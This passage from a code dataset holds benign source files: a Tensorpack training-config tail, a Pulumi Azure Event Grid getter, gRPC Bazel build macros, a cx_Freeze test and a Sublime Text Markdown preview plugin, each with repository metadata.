(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
| true
| true
|
f70b75434414c84f9bbb1cf2d7b60ad9a8239b4c
| 3,882
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
"""
Domain Topic.
"""
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified identifier of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
Provisioning state of the domain topic.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
"""
Domain Topic.
Latest API Version: 2020-06-01.
:param str domain_name: Name of the domain.
:param str domain_topic_name: Name of the topic.
:param str resource_group_name: The name of the resource group within the user's subscription.
"""
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
| 34.660714
| 188
| 0.657908
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
| true
| true
|
f70b75ad57c09c88cd88ad107f911048b4df0d20
| 11,050
|
bzl
|
Python
|
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is for the gRPC build system. This isn't intended to be used outsite of
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platform's build system files.
#
# Please consider that there should be a high bar for additions and changes to
# this file.
# Each rule listed must be re-written for Google's internal build system, and
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes won't be used for the poller-specific versions of a test
# automatically, you need to set them explicitly (if applicable)
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
# the vanilla version of the test should run on platforms that only
# support a single poller
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux", # linux supports multiple pollers
]),
**args
)
# on linux we run the same test multiple times, once for each poller
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
# the test behavior doesn't depend on polling, just generate the test
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
"""The grpc version of objc_library, only used for the Objective-C library compilation
Args:
name: name of target
hdrs: public headers
srcs: all source files (.m)
textual_hdrs: private headers
data: any other bundle resources
defines: preprocessors
includes: added to search path, always [the path to objc directory]
deps: dependencies
visibility: visibility, default to public
"""
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
| 31.126761
| 253
| 0.549864
|
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platform's build system files.
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes won't be used for the poller-specific versions of a test
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux",
]),
**args
)
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
| true
| true
|
f70b75fafa63025b402d17cbd62623efb90964dc
| 813
|
py
|
Python
|
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | null | null | null |
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | null | null | null |
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 1
|
2019-05-12T13:20:31.000Z
|
2019-05-12T13:20:31.000Z
|
import os.path
import sys
from nose.tools import assert_raises
from cx_Freeze.common import ConfigError, process_path_specs
rootdir = "C:\\" if sys.platform == "win32" else "/"
def test_process_path_specs():
inp = [
os.path.join(rootdir, "foo", "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
outp = process_path_specs(inp)
assert outp == [
(os.path.join(rootdir, "foo", "bar"), "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
def test_process_path_specs_bad():
with assert_raises(ConfigError):
process_path_specs(
[(os.path.join(rootdir, "foo"), os.path.join(rootdir, "bar"))]
)
with assert_raises(ConfigError):
process_path_specs([("a", "b", "c")])
| 26.225806
| 74
| 0.606396
|
import os.path
import sys
from nose.tools import assert_raises
from cx_Freeze.common import ConfigError, process_path_specs
rootdir = "C:\\" if sys.platform == "win32" else "/"
def test_process_path_specs():
inp = [
os.path.join(rootdir, "foo", "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
outp = process_path_specs(inp)
assert outp == [
(os.path.join(rootdir, "foo", "bar"), "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
def test_process_path_specs_bad():
with assert_raises(ConfigError):
process_path_specs(
[(os.path.join(rootdir, "foo"), os.path.join(rootdir, "bar"))]
)
with assert_raises(ConfigError):
process_path_specs([("a", "b", "c")])
| true
| true
|
f70b77fb0efe1cafb20ffc7d735e9eb9e9f2742d
| 2,768
|
py
|
Python
|
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import webbrowser
import sublime
import sublime_plugin
from . import MDETextCommand
from . import plugin_name
from . import settings
from python_utils.misc_utils import get_system_tempdir
from python_utils.mistune_utils import md
from python_utils.sublime_text_utils.utils import get_file_path
from python_utils.sublime_text_utils.utils import get_view_context
from python_utils.sublime_text_utils.utils import substitute_variables
__all__ = [
"MdeMarkdownPreviewCommand",
"MdeMarkdownPreviewListener"
]
_html_template = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<title>Markdown Editing Fork - Preview</title>
{stylesheets}
</head>
<body>
<div class="content boxed">
{content}
</div>
</body>
</html>
"""
_stylesheet_link_template = '<link rel="stylesheet" href="{href}" />'
class StorageClass():
def __init__(self):
self.open_previews = {}
Storage = StorageClass()
class MdeMarkdownPreviewCommand(MDETextCommand):
def run(self, edit):
file_path = get_file_path(self.view)
text = self.view.substr(sublime.Region(0, self.view.size()))
if not text or not file_path:
sublime.status_message("No content to preview")
return
html_file_id = "%d-%d" % (self.view.window().id(), self.view.id())
html_file_path = os.path.join(get_system_tempdir(), plugin_name, html_file_id + ".html")
os.makedirs(os.path.dirname(html_file_path), exist_ok=True)
with open(html_file_path, "w", encoding="UTF-8") as temp_file:
temp_file.write(_html_template.format(
stylesheets=self._ody_get_stylesheets(),
content=md(text))
)
if html_file_id not in Storage.open_previews:
Storage.open_previews = html_file_id
webbrowser.open(html_file_path, new=2, autoraise=True)
else:
sublime.status_message("Reload web page")
def _ody_get_stylesheets(self):
stylesheets = substitute_variables(get_view_context(
self.view), settings.get("preview_stylesheets"))
return "\n".join([_stylesheet_link_template.format(href=s)
for s in stylesheets]) if stylesheets else ""
class MdeMarkdownPreviewListener(sublime_plugin.EventListener):
def on_close(self, view):
if view and view.id() and view.window() and view.window().id():
html_file_id = "%d-%d" % (view.window().id(), view.id())
if html_file_id in Storage.open_previews:
del Storage.open_previews[html_file_id]
if __name__ == "__main__":
pass
| 28.833333
| 96
| 0.680275
|
import os
import webbrowser
import sublime
import sublime_plugin
from . import MDETextCommand
from . import plugin_name
from . import settings
from python_utils.misc_utils import get_system_tempdir
from python_utils.mistune_utils import md
from python_utils.sublime_text_utils.utils import get_file_path
from python_utils.sublime_text_utils.utils import get_view_context
from python_utils.sublime_text_utils.utils import substitute_variables
__all__ = [
"MdeMarkdownPreviewCommand",
"MdeMarkdownPreviewListener"
]
_html_template = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<title>Markdown Editing Fork - Preview</title>
{stylesheets}
</head>
<body>
<div class="content boxed">
{content}
</div>
</body>
</html>
"""
_stylesheet_link_template = '<link rel="stylesheet" href="{href}" />'
class StorageClass():
def __init__(self):
self.open_previews = {}
Storage = StorageClass()
class MdeMarkdownPreviewCommand(MDETextCommand):
def run(self, edit):
file_path = get_file_path(self.view)
text = self.view.substr(sublime.Region(0, self.view.size()))
if not text or not file_path:
sublime.status_message("No content to preview")
return
html_file_id = "%d-%d" % (self.view.window().id(), self.view.id())
html_file_path = os.path.join(get_system_tempdir(), plugin_name, html_file_id + ".html")
os.makedirs(os.path.dirname(html_file_path), exist_ok=True)
with open(html_file_path, "w", encoding="UTF-8") as temp_file:
temp_file.write(_html_template.format(
stylesheets=self._ody_get_stylesheets(),
content=md(text))
)
if html_file_id not in Storage.open_previews:
Storage.open_previews = html_file_id
webbrowser.open(html_file_path, new=2, autoraise=True)
else:
sublime.status_message("Reload web page")
def _ody_get_stylesheets(self):
stylesheets = substitute_variables(get_view_context(
self.view), settings.get("preview_stylesheets"))
return "\n".join([_stylesheet_link_template.format(href=s)
for s in stylesheets]) if stylesheets else ""
class MdeMarkdownPreviewListener(sublime_plugin.EventListener):
def on_close(self, view):
if view and view.id() and view.window() and view.window().id():
html_file_id = "%d-%d" % (view.window().id(), view.id())
if html_file_id in Storage.open_previews:
del Storage.open_previews[html_file_id]
if __name__ == "__main__":
pass
| true
| true
|
f70b7841faae47aa58d61ae0fc8a4215d631a15e
| 5,270
|
py
|
Python
|
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | 3
|
2021-06-15T17:29:32.000Z
|
